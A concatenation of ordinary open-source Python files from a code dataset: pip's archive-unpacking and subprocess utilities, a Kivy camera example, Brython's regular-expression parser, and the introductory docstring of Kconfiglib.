if user_site:
sites.append(user_site)
sites.append(site_packages)
for site in sites:
egglink = os.path.join(site, dist.project_name) + '.egg-link'
if os.path.isfile(egglink):
return egglink
def dist_location(dist):
"""
Get the site-packages location of this distribution. Generally
this is dist.location, except in the case of develop-installed
packages, where dist.location is the source code location, and we
want to know where the egg-link file is.
"""
egg_link = egg_link_path(dist)
if egg_link:
return egg_link
return dist.location
def get_terminal_size():
"""Returns a tuple (x, y) representing the width(x) and the height(x)
in characters of the terminal window."""
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
import struct
cr = struct.unpack(
'hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234')
)
except:
return None
if cr == (0, 0):
return None
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (os.environ.get('LINES', 25), os.environ.get('COLUMNS', 80))
return int(cr[1]), int(cr[0])
def current_umask():
"""Get the current umask which involves having to set it temporarily."""
mask = os.umask(0)
os.umask(mask)
return mask
def unzip_file(filename, location, flatten=True):
"""
Unzip the file (with path `filename`) to the destination `location`. All
files are written based on system defaults and umask (i.e. permissions are
not preserved), except that regular file members with any execute
permissions (user, group, or world) have "chmod +x" applied after being
written. Note that for windows, any execute changes using os.chmod are
no-ops per the python docs.
"""
ensure_dir(location)
zipfp = open(filename, 'rb')
try:
zip = zipfile.ZipFile(zipfp, allowZip64=True)
leading = has_leading_dir(zip.namelist()) and flatten
for info in zip.infolist():
name = info.filename
data = zip.read(name)
fn = name
if leading:
fn = split_leading_dir(name)[1]
fn = os.path.join(location, fn)
dir = os.path.dirname(fn)
if fn.endswith('/') or fn.endswith('\\'):
# A directory
ensure_dir(fn)
else:
ensure_dir(dir)
fp = open(fn, 'wb')
try:
fp.write(data)
finally:
fp.close()
mode = info.external_attr >> 16
# if mode and regular file and any execute permissions for
# user/group/world?
if mode and stat.S_ISREG(mode) and mode & 0o111:
# make dest file have execute for user/group/world
# (chmod +x) no-op on windows per python docs
os.chmod(fn, (0o777 - current_umask() | 0o111))
finally:
zipfp.close()
def untar_file(filename, location):
"""
Untar the file (with path `filename`) to the destination `location`.
All files are written based on system defaults and umask (i.e. permissions
are not preserved), except that regular file members with any execute
permissions (user, group, or world) have "chmod +x" applied after being
written. Note that for windows, any execute changes using os.chmod are
no-ops per the python docs.
"""
ensure_dir(location)
if filename.lower().endswith('.gz') or filename.lower().endswith('.tgz'):
mode = 'r:gz'
elif filename.lower().endswith(BZ2_EXTENSIONS):
mode = 'r:bz2'
elif filename.lower().endswith('.tar'):
mode = 'r'
else:
logger.warning(
'Cannot determine compression type for file %s', filename,
)
mode = 'r:*'
tar = tarfile.open(filename, mode)
try:
# note: python<=2.5 doesn't seem to know about pax headers, filter them
leading = has_leading_dir([
member.name for member in tar.getmembers()
if member.name != 'pax_global_header'
])
for member in tar.getmembers():
fn = member.name
if fn == 'pax_global_header':
continue
if leading:
fn = split_leading_dir(fn)[1]
path = os.path.join(location, fn)
if member.isdir():
ensure_dir(path)
elif member.issym():
try:
tar._extract_member(member, path)
except Exception as exc:
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
logger.warning(
'In the tar file %s the member %s is invalid: %s',
filename, member.name, exc,
)
continue
else:
try:
fp = tar.extractfile(member)
except (KeyError, AttributeError) as exc:
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
logger.warning(
'In the tar file %s the member %s is invalid: %s',
filename, member.name, exc,
)
continue
ensure_dir(os.path.dirname(path))
destfp = open(path, 'wb')
try:
shutil.copyfileobj(fp, destfp)
finally:
destfp.close()
fp.close()
# member have any execute permissions for user/group/world?
if member.mode & 0o111:
# make dest file have execute for user/group/world
# no-op on windows per python docs
os.chmod(path, (0o777 - current_umask() | 0o111))
finally:
tar.close()
def unpack_file(filename, location, content_type, link):
filename = os.path.realpath(filename)
if (content_type == 'application/zip' or
filename.lower().endswith(ZIP_EXTENSIONS) or
zipfile.is_zipfile(filename)):
unzip_file(
filename,
location,
flatten=not filename.endswith('.whl')
)
elif (content_type == 'application/x-gzip' or
tarfile.is_tarfile(filename) or
filename.lower().endswith(TAR_EXTENSIONS + BZ2_EXTENSIONS)):
untar_file(filename, location)
elif (content_type and content_type.startswith('text/html') and
is_svn_page(file_contents(filename))):
# We don't really care about this
from pip.vcs.subversion import Subversion
Subversion('svn+' + link.url).unpack(location)
else:
# FIXME: handle?
# FIXME: magic signatures?
logger.critical(
'Cannot unpack file %s (downloaded from %s, content-type: %s); '
'cannot detect archive format',
filename, location, content_type,
)
raise InstallationError(
'Cannot determine archive format of %s' % location
)
def remove_tracebacks(output):
pattern = (r'(?:\W+File "(?:.*)", line (?:.*)\W+(?:.*)\W+\^\W+)?'
r'Syntax(?:Error|Warning): (?:.*)')
output = re.sub(pattern, '', output)
if PY2:
return output
# compileall.compile_dir() prints different messages to stdout
# in Python 3
return re.sub(r"\*\*\* Error compiling (?:.*)", '', output)
def call_subprocess(cmd, show_stdout=True, cwd=None,
raise_on_returncode=True,
command_level=logging.DEBUG, command_desc=None,
extra_environ=None):
if command_desc is None:
cmd_parts = []
for part in cmd:
if ' ' in part or '\n' in part or '"' in part or "'" in part:
part = '"%s"' % part.replace('"', '\\"')
cmd_parts.append(part)
command_desc = ' '.join(cmd_parts)
if show_stdout:
stdout = None
else:
stdout = subprocess.PIPE
logger.log(command_level, "Running command %s", command_desc)
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
try:
proc = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
cwd=cwd, env=env)
except Exception as exc:
logger.critical(
"Error %s while executing command %s", exc, command_desc,
)
raise
all_output = []
if stdout is not None:
while True:
line = console_to_str(proc.stdout.readline())
if not line:
break
line = line.rstrip()
all_output.append(line + '\n')
logger.debug(line)
if not all_output:
returned_stdout, returned_stderr = proc.communicate()
all_output = [returned_stdout or '']
proc.wait()
if proc.returncode:
if raise_on_returncode:
if all_output:
logger.info(
'Complete output from command %s:', command_desc,
)
logger.info(
''.join(all_output) +
'\n----------------------------------------'
)
raise InstallationError(
'Command "%s" failed with error code %s in %s'
% (command_desc, proc.returncode, cwd))
else:
logger.warning(
'Command "%s" had error code %s in %s',
command_desc, proc.returncode, cwd,
)
if stdout is not None:
return remove_tracebacks(''.join(all_output))
def read_text_file(filename):
"""Return the contents of *filename*.
Try to decode the file contents with utf-8, the preferred system encoding
(e.g., cp1252 on some Windows machines), and latin1, in that order.
Decoding a byte string with latin1 will never raise an error. In the worst
case, the returned string will contain some garbage characters.
"""
with open(filename, 'rb') as fp:
data = fp.read()
encodings = ['utf-8', locale.getpreferredencoding(False), 'latin1']
for enc in encodings:
try:
data = data.decode(enc)
except UnicodeDecodeError:
continue
break
assert type(data) != bytes # Latin1 should have worked.
return data
def _make_build_dir(build_dir):
os.makedirs(build_dir)
write_delete_marker_file(build_dir)
class FakeFile(object):
"""Wrap a list of lines in an object with readline() to make
ConfigParser happy."""
def __init__(self, lines):
self._gen = (l for l in lines)
def readline(self):
try:
try:
return next(self._gen)
except NameError:
return self._gen.next()
except StopIteration:
return ''
def __iter__(self):
return self._gen
class StreamWrapper(StringIO):
@classmethod
def from_stream(cls, orig_stream):
cls.orig_stream = orig_stream
return cls()
# compileall.compile_dir() needs stdout.encoding to print to stdout
@property
def encoding(self):
return self.orig_stream.encoding
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO.
Taken from Lib/support/__init__.py in the CPython repo.
"""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, StreamWrapper.from_stream(orig_stdout))
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print('hello')
self.assertEqual(stdout.getvalue(), 'hello\n')
Taken from Lib/support/__init__.py in the CPython repo.
"""
return captured_output('stdout')
class cached_property(object):
"""A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property.
Source: https://github.com/bottlepy/bottle/blob/0.11.5/bottle.py#L175
"""
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.func = func
def __get__(self, obj, cls):
if obj is None:
# We're being accessed from the class itself, not from an object
return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
def get_installed_version(dist_name):
"""Get the installed version of dist_name avoiding pkg_resources cache"""
# Create a requirement that we'll look for inside of setuptools.
req = pkg_resources.Requirement.parse(dist_name)
# We want to avoid having this cached, so we need to construct a new
# working set each time.
working_set = pkg_resources.WorkingSet()
# Get the installed distribution from our working set
dist = working_set.find(req)
# Check to see if we got an installed distribution or not, if we did
# we want to return it's version.
return dist.version if dist else None
|
aron-bordin/kivy
|
refs/heads/master
|
examples/camera/main.py
|
40
|
'''
Camera Example
==============
This example demonstrates a simple use of the camera. It shows a window with
a buttoned labelled 'play' to turn the camera on and off. Note that
not finding a camera, perhaps because gstreamer is not installed, will
throw an exception during the kv language processing.
'''
# Uncomment these lines to see all the messages
#from kivy.logger import Logger
#import logging
#Logger.setLevel(logging.TRACE)
from kivy.app import App
from kivy.lang import Builder
kv = '''
BoxLayout:
orientation: 'vertical'
Camera:
id: camera
resolution: (640, 480)
play: False
ToggleButton:
text: 'Play'
on_press: camera.play = not camera.play
size_hint_y: None
height: '48dp'
'''
class TestCamera(App):
def build(self):
return Builder.load_string(kv)
TestCamera().run()
|
HatsuneMiku0309/2014cdag10
|
refs/heads/master
|
wsgi/static/Brython2.1.0-20140419-113919/Lib/sre_parse.py
|
111
|
#
# Secret Labs' Regular Expression Engine
#
# convert re-style regular expression to sre pattern
#
# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved.
#
# See the sre.py file for information on usage and redistribution.
#
"""Internal support module for sre"""
# XXX: show string offset and offending character for all errors
import sys
from sre_constants import *
from _sre import MAXREPEAT
SPECIAL_CHARS = ".\\[{()*+?^$|"
REPEAT_CHARS = "*+?{"
DIGITS = set("0123456789")
OCTDIGITS = set("01234567")
HEXDIGITS = set("0123456789abcdefABCDEF")
WHITESPACE = set(" \t\n\r\v\f")
ESCAPES = {
r"\a": (LITERAL, ord("\a")),
r"\b": (LITERAL, ord("\b")),
r"\f": (LITERAL, ord("\f")),
r"\n": (LITERAL, ord("\n")),
r"\r": (LITERAL, ord("\r")),
r"\t": (LITERAL, ord("\t")),
r"\v": (LITERAL, ord("\v")),
r"\\": (LITERAL, ord("\\"))
}
CATEGORIES = {
r"\A": (AT, AT_BEGINNING_STRING), # start of string
r"\b": (AT, AT_BOUNDARY),
r"\B": (AT, AT_NON_BOUNDARY),
r"\d": (IN, [(CATEGORY, CATEGORY_DIGIT)]),
r"\D": (IN, [(CATEGORY, CATEGORY_NOT_DIGIT)]),
r"\s": (IN, [(CATEGORY, CATEGORY_SPACE)]),
r"\S": (IN, [(CATEGORY, CATEGORY_NOT_SPACE)]),
r"\w": (IN, [(CATEGORY, CATEGORY_WORD)]),
r"\W": (IN, [(CATEGORY, CATEGORY_NOT_WORD)]),
r"\Z": (AT, AT_END_STRING), # end of string
}
FLAGS = {
# standard flags
"i": SRE_FLAG_IGNORECASE,
"L": SRE_FLAG_LOCALE,
"m": SRE_FLAG_MULTILINE,
"s": SRE_FLAG_DOTALL,
"x": SRE_FLAG_VERBOSE,
# extensions
"a": SRE_FLAG_ASCII,
"t": SRE_FLAG_TEMPLATE,
"u": SRE_FLAG_UNICODE,
}
class Pattern:
# master pattern object. keeps track of global attributes
def __init__(self):
self.flags = 0
self.open = []
self.groups = 1
self.groupdict = {}
def opengroup(self, name=None):
gid = self.groups
self.groups = gid + 1
if name is not None:
ogid = self.groupdict.get(name, None)
if ogid is not None:
raise error("redefinition of group name %s as group %d; "
"was group %d" % (repr(name), gid, ogid))
self.groupdict[name] = gid
self.open.append(gid)
return gid
def closegroup(self, gid):
self.open.remove(gid)
def checkgroup(self, gid):
return gid < self.groups and gid not in self.open
class SubPattern:
# a subpattern, in intermediate form
def __init__(self, pattern, data=None):
self.pattern = pattern
if data is None:
data = []
self.data = data
self.width = None
def __iter__(self):
return iter(self.data)
def dump(self, level=0):
nl = 1
seqtypes = (tuple, list)
for op, av in self.data:
print(level*" " + op, end=' '); nl = 0
if op == "in":
# member sublanguage
print(); nl = 1
for op, a in av:
print((level+1)*" " + op, a)
elif op == "branch":
print(); nl = 1
i = 0
for a in av[1]:
if i > 0:
print(level*" " + "or")
a.dump(level+1); nl = 1
i = i + 1
elif isinstance(av, seqtypes):
for a in av:
if isinstance(a, SubPattern):
if not nl: print()
a.dump(level+1); nl = 1
else:
print(a, end=' ') ; nl = 0
else:
print(av, end=' ') ; nl = 0
if not nl: print()
def __repr__(self):
return repr(self.data)
def __len__(self):
return len(self.data)
def __delitem__(self, index):
del self.data[index]
def __getitem__(self, index):
if isinstance(index, slice):
return SubPattern(self.pattern, self.data[index])
return self.data[index]
def __setitem__(self, index, code):
self.data[index] = code
def insert(self, index, code):
self.data.insert(index, code)
def append(self, code):
self.data.append(code)
def getwidth(self):
# determine the width (min, max) for this subpattern
if self.width:
return self.width
lo = hi = 0
UNITCODES = (ANY, RANGE, IN, LITERAL, NOT_LITERAL, CATEGORY)
REPEATCODES = (MIN_REPEAT, MAX_REPEAT)
for op, av in self.data:
if op is BRANCH:
i = sys.maxsize
j = 0
for av in av[1]:
l, h = av.getwidth()
i = min(i, l)
j = max(j, h)
lo = lo + i
hi = hi + j
elif op is CALL:
i, j = av.getwidth()
lo = lo + i
hi = hi + j
elif op is SUBPATTERN:
i, j = av[1].getwidth()
lo = lo + i
hi = hi + j
elif op in REPEATCODES:
i, j = av[2].getwidth()
lo = lo + int(i) * av[0]
hi = hi + int(j) * av[1]
elif op in UNITCODES:
lo = lo + 1
hi = hi + 1
elif op == SUCCESS:
break
self.width = int(min(lo, sys.maxsize)), int(min(hi, sys.maxsize))
return self.width
class Tokenizer:
def __init__(self, string):
self.istext = isinstance(string, str)
self.string = string
self.index = 0
self.__next()
def __next(self):
if self.index >= len(self.string):
self.next = None
return
char = self.string[self.index:self.index+1]
# Special case for the str8, since indexing returns a integer
# XXX This is only needed for test_bug_926075 in test_re.py
if char and not self.istext:
char = chr(char[0])
if char == "\\":
try:
c = self.string[self.index + 1]
except IndexError:
raise error("bogus escape (end of line)")
if not self.istext:
c = chr(c)
char = char + c
self.index = self.index + len(char)
self.next = char
def match(self, char, skip=1):
if char == self.next:
if skip:
self.__next()
return 1
return 0
def get(self):
this = self.next
self.__next()
return this
def getwhile(self, n, charset):
result = ''
for _ in range(n):
c = self.next
if c not in charset:
break
result += c
self.__next()
return result
def tell(self):
return self.index, self.next
def seek(self, index):
self.index, self.next = index
def isident(char):
return "a" <= char <= "z" or "A" <= char <= "Z" or char == "_"
def isdigit(char):
return "0" <= char <= "9"
def isname(name):
# check that group name is a valid string
if not isident(name[0]):
return False
for char in name[1:]:
if not isident(char) and not isdigit(char):
return False
return True
def _class_escape(source, escape):
# handle escape code inside character class
code = ESCAPES.get(escape)
if code:
return code
code = CATEGORIES.get(escape)
if code and code[0] == IN:
return code
try:
c = escape[1:2]
if c == "x":
# hexadecimal escape (exactly two digits)
escape += source.getwhile(2, HEXDIGITS)
if len(escape) != 4:
raise ValueError
return LITERAL, int(escape[2:], 16) & 0xff
elif c == "u" and source.istext:
# unicode escape (exactly four digits)
escape += source.getwhile(4, HEXDIGITS)
if len(escape) != 6:
raise ValueError
return LITERAL, int(escape[2:], 16)
elif c == "U" and source.istext:
# unicode escape (exactly eight digits)
escape += source.getwhile(8, HEXDIGITS)
if len(escape) != 10:
raise ValueError
c = int(escape[2:], 16)
chr(c) # raise ValueError for invalid code
return LITERAL, c
elif c in OCTDIGITS:
# octal escape (up to three digits)
escape += source.getwhile(2, OCTDIGITS)
return LITERAL, int(escape[1:], 8) & 0xff
elif c in DIGITS:
raise ValueError
if len(escape) == 2:
return LITERAL, ord(escape[1])
except ValueError:
pass
raise error("bogus escape: %s" % repr(escape))
def _escape(source, escape, state):
# handle escape code in expression
code = CATEGORIES.get(escape)
if code:
return code
code = ESCAPES.get(escape)
if code:
return code
try:
c = escape[1:2]
if c == "x":
# hexadecimal escape
escape += source.getwhile(2, HEXDIGITS)
if len(escape) != 4:
raise ValueError
return LITERAL, int(escape[2:], 16) & 0xff
elif c == "u" and source.istext:
# unicode escape (exactly four digits)
escape += source.getwhile(4, HEXDIGITS)
if len(escape) != 6:
raise ValueError
return LITERAL, int(escape[2:], 16)
elif c == "U" and source.istext:
# unicode escape (exactly eight digits)
escape += source.getwhile(8, HEXDIGITS)
if len(escape) != 10:
raise ValueError
c = int(escape[2:], 16)
chr(c) # raise ValueError for invalid code
return LITERAL, c
elif c == "0":
# octal escape
escape += source.getwhile(2, OCTDIGITS)
return LITERAL, int(escape[1:], 8) & 0xff
elif c in DIGITS:
# octal escape *or* decimal group reference (sigh)
if source.next in DIGITS:
escape = escape + source.get()
if (escape[1] in OCTDIGITS and escape[2] in OCTDIGITS and
source.next in OCTDIGITS):
# got three octal digits; this is an octal escape
escape = escape + source.get()
return LITERAL, int(escape[1:], 8) & 0xff
# not an octal escape, so this is a group reference
group = int(escape[1:])
if group < state.groups:
if not state.checkgroup(group):
raise error("cannot refer to open group")
return GROUPREF, group
raise ValueError
if len(escape) == 2:
return LITERAL, ord(escape[1])
except ValueError:
pass
raise error("bogus escape: %s" % repr(escape))
def _parse_sub(source, state, nested=1):
# parse an alternation: a|b|c
items = []
itemsappend = items.append
sourcematch = source.match
while 1:
itemsappend(_parse(source, state))
if sourcematch("|"):
continue
if not nested:
break
if not source.next or sourcematch(")", 0):
break
else:
raise error("pattern not properly closed")
if len(items) == 1:
return items[0]
subpattern = SubPattern(state)
subpatternappend = subpattern.append
# check if all items share a common prefix
while 1:
prefix = None
for item in items:
if not item:
break
if prefix is None:
prefix = item[0]
elif item[0] != prefix:
break
else:
# all subitems start with a common "prefix".
# move it out of the branch
for item in items:
del item[0]
subpatternappend(prefix)
continue # check next one
break
# check if the branch can be replaced by a character set
for item in items:
if len(item) != 1 or item[0][0] != LITERAL:
break
else:
# we can store this as a character set instead of a
# branch (the compiler may optimize this even more)
set = []
setappend = set.append
for item in items:
setappend(item[0])
subpatternappend((IN, set))
return subpattern
subpattern.append((BRANCH, (None, items)))
return subpattern
def _parse_sub_cond(source, state, condgroup):
item_yes = _parse(source, state)
if source.match("|"):
item_no = _parse(source, state)
if source.match("|"):
raise error("conditional backref with more than two branches")
else:
item_no = None
if source.next and not source.match(")", 0):
raise error("pattern not properly closed")
subpattern = SubPattern(state)
subpattern.append((GROUPREF_EXISTS, (condgroup, item_yes, item_no)))
return subpattern
_PATTERNENDERS = set("|)")
_ASSERTCHARS = set("=!<")
_LOOKBEHINDASSERTCHARS = set("=!")
_REPEATCODES = set([MIN_REPEAT, MAX_REPEAT])
def _parse(source, state):
# parse a simple pattern
subpattern = SubPattern(state)
# precompute constants into local variables
subpatternappend = subpattern.append
sourceget = source.get
sourcematch = source.match
_len = len
PATTERNENDERS = _PATTERNENDERS
ASSERTCHARS = _ASSERTCHARS
LOOKBEHINDASSERTCHARS = _LOOKBEHINDASSERTCHARS
REPEATCODES = _REPEATCODES
while 1:
if source.next in PATTERNENDERS:
break # end of subpattern
this = sourceget()
if this is None:
break # end of pattern
if state.flags & SRE_FLAG_VERBOSE:
# skip whitespace and comments
if this in WHITESPACE:
continue
if this == "#":
while 1:
this = sourceget()
if this in (None, "\n"):
break
continue
if this and this[0] not in SPECIAL_CHARS:
subpatternappend((LITERAL, ord(this)))
elif this == "[":
# character set
set = []
setappend = set.append
## if sourcematch(":"):
## pass # handle character classes
if sourcematch("^"):
setappend((NEGATE, None))
# check remaining characters
start = set[:]
while 1:
this = sourceget()
if this == "]" and set != start:
break
elif this and this[0] == "\\":
code1 = _class_escape(source, this)
elif this:
code1 = LITERAL, ord(this)
else:
raise error("unexpected end of regular expression")
if sourcematch("-"):
# potential range
this = sourceget()
if this == "]":
if code1[0] is IN:
code1 = code1[1][0]
setappend(code1)
setappend((LITERAL, ord("-")))
break
elif this:
if this[0] == "\\":
code2 = _class_escape(source, this)
else:
code2 = LITERAL, ord(this)
if code1[0] != LITERAL or code2[0] != LITERAL:
raise error("bad character range")
lo = code1[1]
hi = code2[1]
if hi < lo:
raise error("bad character range")
setappend((RANGE, (lo, hi)))
else:
raise error("unexpected end of regular expression")
else:
if code1[0] is IN:
code1 = code1[1][0]
setappend(code1)
# XXX: <fl> should move set optimization to compiler!
if _len(set)==1 and set[0][0] is LITERAL:
subpatternappend(set[0]) # optimization
elif _len(set)==2 and set[0][0] is NEGATE and set[1][0] is LITERAL:
subpatternappend((NOT_LITERAL, set[1][1])) # optimization
else:
# XXX: <fl> should add charmap optimization here
subpatternappend((IN, set))
elif this and this[0] in REPEAT_CHARS:
# repeat previous item
if this == "?":
min, max = 0, 1
elif this == "*":
min, max = 0, MAXREPEAT
elif this == "+":
min, max = 1, MAXREPEAT
elif this == "{":
if source.next == "}":
subpatternappend((LITERAL, ord(this)))
continue
here = source.tell()
min, max = 0, MAXREPEAT
lo = hi = ""
while source.next in DIGITS:
lo = lo + source.get()
if sourcematch(","):
while source.next in DIGITS:
hi = hi + sourceget()
else:
hi = lo
if not sourcematch("}"):
subpatternappend((LITERAL, ord(this)))
source.seek(here)
continue
if lo:
min = int(lo)
if min >= MAXREPEAT:
raise OverflowError("the repetition number is too large")
if hi:
max = int(hi)
if max >= MAXREPEAT:
raise OverflowError("the repetition number is too large")
if max < min:
raise error("bad repeat interval")
else:
raise error("not supported")
# figure out which item to repeat
if subpattern:
item = subpattern[-1:]
else:
item = None
if not item or (_len(item) == 1 and item[0][0] == AT):
raise error("nothing to repeat")
if item[0][0] in REPEATCODES:
raise error("multiple repeat")
if sourcematch("?"):
subpattern[-1] = (MIN_REPEAT, (min, max, item))
else:
subpattern[-1] = (MAX_REPEAT, (min, max, item))
elif this == ".":
subpatternappend((ANY, None))
elif this == "(":
group = 1
name = None
condgroup = None
if sourcematch("?"):
group = 0
# options
if sourcematch("P"):
# python extensions
if sourcematch("<"):
# named group: skip forward to end of name
name = ""
while 1:
char = sourceget()
if char is None:
raise error("unterminated name")
if char == ">":
break
name = name + char
group = 1
if not name:
raise error("missing group name")
if not isname(name):
raise error("bad character in group name")
elif sourcematch("="):
# named backreference
name = ""
while 1:
char = sourceget()
if char is None:
raise error("unterminated name")
if char == ")":
break
name = name + char
if not name:
raise error("missing group name")
if not isname(name):
raise error("bad character in group name")
gid = state.groupdict.get(name)
if gid is None:
raise error("unknown group name")
subpatternappend((GROUPREF, gid))
continue
else:
char = sourceget()
if char is None:
raise error("unexpected end of pattern")
raise error("unknown specifier: ?P%s" % char)
elif sourcematch(":"):
# non-capturing group
group = 2
elif sourcematch("#"):
# comment
while 1:
if source.next is None or source.next == ")":
break
sourceget()
if not sourcematch(")"):
raise error("unbalanced parenthesis")
continue
elif source.next in ASSERTCHARS:
# lookahead assertions
char = sourceget()
dir = 1
if char == "<":
if source.next not in LOOKBEHINDASSERTCHARS:
raise error("syntax error")
dir = -1 # lookbehind
char = sourceget()
p = _parse_sub(source, state)
if not sourcematch(")"):
raise error("unbalanced parenthesis")
if char == "=":
subpatternappend((ASSERT, (dir, p)))
else:
subpatternappend((ASSERT_NOT, (dir, p)))
continue
elif sourcematch("("):
# conditional backreference group
condname = ""
while 1:
char = sourceget()
if char is None:
raise error("unterminated name")
if char == ")":
break
condname = condname + char
group = 2
if not condname:
raise error("missing group name")
if isname(condname):
condgroup = state.groupdict.get(condname)
if condgroup is None:
raise error("unknown group name")
else:
try:
condgroup = int(condname)
except ValueError:
raise error("bad character in group name")
else:
# flags
if not source.next in FLAGS:
raise error("unexpected end of pattern")
while source.next in FLAGS:
state.flags = state.flags | FLAGS[sourceget()]
if group:
# parse group contents
if group == 2:
# anonymous group
group = None
else:
group = state.opengroup(name)
if condgroup:
p = _parse_sub_cond(source, state, condgroup)
else:
p = _parse_sub(source, state)
if not sourcematch(")"):
raise error("unbalanced parenthesis")
if group is not None:
state.closegroup(group)
subpatternappend((SUBPATTERN, (group, p)))
else:
while 1:
char = sourceget()
if char is None:
raise error("unexpected end of pattern")
if char == ")":
break
raise error("unknown extension")
elif this == "^":
subpatternappend((AT, AT_BEGINNING))
elif this == "$":
subpattern.append((AT, AT_END))
elif this and this[0] == "\\":
code = _escape(source, this, state)
subpatternappend(code)
else:
raise error("parser error")
return subpattern
def fix_flags(src, flags):
# Check and fix flags according to the type of pattern (str or bytes)
if isinstance(src, str):
if not flags & SRE_FLAG_ASCII:
flags |= SRE_FLAG_UNICODE
elif flags & SRE_FLAG_UNICODE:
raise ValueError("ASCII and UNICODE flags are incompatible")
else:
if flags & SRE_FLAG_UNICODE:
raise ValueError("can't use UNICODE flag with a bytes pattern")
return flags
def parse(str, flags=0, pattern=None):
# parse 're' pattern into list of (opcode, argument) tuples
source = Tokenizer(str)
if pattern is None:
pattern = Pattern()
pattern.flags = flags
pattern.str = str
p = _parse_sub(source, pattern, 0)
p.pattern.flags = fix_flags(str, p.pattern.flags)
tail = source.get()
if tail == ")":
raise error("unbalanced parenthesis")
elif tail:
raise error("bogus characters at end of regular expression")
if flags & SRE_FLAG_DEBUG:
p.dump()
if not (flags & SRE_FLAG_VERBOSE) and p.pattern.flags & SRE_FLAG_VERBOSE:
# the VERBOSE flag was switched on inside the pattern. to be
# on the safe side, we'll parse the whole thing again...
return parse(str, p.pattern.flags)
return p
def parse_template(source, pattern):
# parse 're' replacement string into list of literals and
# group references
s = Tokenizer(source)
sget = s.get
p = []
a = p.append
def literal(literal, p=p, pappend=a):
if p and p[-1][0] is LITERAL:
p[-1] = LITERAL, p[-1][1] + literal
else:
pappend((LITERAL, literal))
sep = source[:0]
if isinstance(sep, str):
makechar = chr
else:
makechar = chr
while 1:
this = sget()
if this is None:
break # end of replacement string
if this and this[0] == "\\":
# group
c = this[1:2]
if c == "g":
name = ""
if s.match("<"):
while 1:
char = sget()
if char is None:
raise error("unterminated group name")
if char == ">":
break
name = name + char
if not name:
raise error("missing group name")
try:
index = int(name)
if index < 0:
raise error("negative group number")
except ValueError:
if not isname(name):
raise error("bad character in group name")
try:
index = pattern.groupindex[name]
except KeyError:
raise IndexError("unknown group name")
a((MARK, index))
elif c == "0":
if s.next in OCTDIGITS:
this = this + sget()
if s.next in OCTDIGITS:
this = this + sget()
literal(makechar(int(this[1:], 8) & 0xff))
elif c in DIGITS:
isoctal = False
if s.next in DIGITS:
this = this + sget()
if (c in OCTDIGITS and this[2] in OCTDIGITS and
s.next in OCTDIGITS):
this = this + sget()
isoctal = True
literal(makechar(int(this[1:], 8) & 0xff))
if not isoctal:
a((MARK, int(this[1:])))
else:
try:
this = makechar(ESCAPES[this][1])
except KeyError:
pass
literal(this)
else:
literal(this)
# convert template to groups and literals lists
i = 0
groups = []
groupsappend = groups.append
literals = [None] * len(p)
if isinstance(source, str):
encode = lambda x: x
else:
# The tokenizer implicitly decodes bytes objects as latin-1, we must
# therefore re-encode the final representation.
encode = lambda x: x.encode('latin-1')
for c, s in p:
if c is MARK:
groupsappend((i, s))
# literal[i] is already None
else:
literals[i] = encode(s)
i = i + 1
return groups, literals
def expand_template(template, match):
g = match.group
sep = match.string[:0]
groups, literals = template
literals = literals[:]
try:
for index, group in groups:
literals[index] = s = g(group)
if s is None:
raise error("unmatched group")
except IndexError:
raise error("invalid group reference")
return sep.join(literals)
|
vzhong/pystacks
|
refs/heads/master
|
examples/__init__.py
|
53
|
__author__ = 'victor'
|
davidgfnet/buildroot-Os
|
refs/heads/master
|
support/scripts/kconfiglib.py
|
146
|
# This is Kconfiglib, a Python library for scripting, debugging, and extracting
# information from Kconfig-based configuration systems. To view the
# documentation, run
#
# $ pydoc kconfiglib
#
# or, if you prefer HTML,
#
# $ pydoc -w kconfiglib
#
# The examples/ subdirectory contains examples, to be run with e.g.
#
# $ make scriptconfig SCRIPT=Kconfiglib/examples/print_tree.py
#
# Look in testsuite.py for the test suite.
"""
Kconfiglib is a Python library for scripting and extracting information from
Kconfig-based configuration systems. Features include the following:
- Symbol values and properties can be looked up and values assigned
programmatically.
- .config files can be read and written.
- Expressions can be evaluated in the context of a Kconfig configuration.
- Relations between symbols can be quickly determined, such as finding all
symbols that reference a particular symbol.
- Highly compatible with the scripts/kconfig/*conf utilities. The test suite
automatically compares outputs between Kconfiglib and the C implementation
for a large number of cases.
For the Linux kernel, scripts are run using
$ make scriptconfig SCRIPT=<path to script> [SCRIPT_ARG=<arg>]
Running scripts via the 'scriptconfig' target ensures that required environment
variables (SRCARCH, ARCH, srctree, KERNELVERSION, etc.) are set up correctly.
Alternative architectures can be specified like for other 'make *config'
targets:
$ make scriptconfig ARCH=mips SCRIPT=<path to script> [SCRIPT_ARG=<arg>]
The script will receive the name of the Kconfig file to load in sys.argv[1].
(As of Linux 3.7.0-rc8 this is always "Kconfig" from the kernel top-level
directory.) If an argument is provided with SCRIPT_ARG, it will appear in
sys.argv[2].
To get an interactive Python prompt with Kconfiglib preloaded and a Config
object 'c' created, use
$ make iscriptconfig [ARCH=<architecture>]
Kconfiglib requires Python 2. For (i)scriptconfig the command to run the Python
interpreter can be passed in the environment variable PYTHONCMD (defaults to
'python'; PyPy works too and is a bit faster).
Look in the examples/ subdirectory for examples, which can be run with e.g.
$ make scriptconfig SCRIPT=Kconfiglib/examples/print_tree.py
or
$ make scriptconfig SCRIPT=Kconfiglib/examples/help_grep.py SCRIPT_ARG="kernel"
Look in testsuite.py for the test suite.
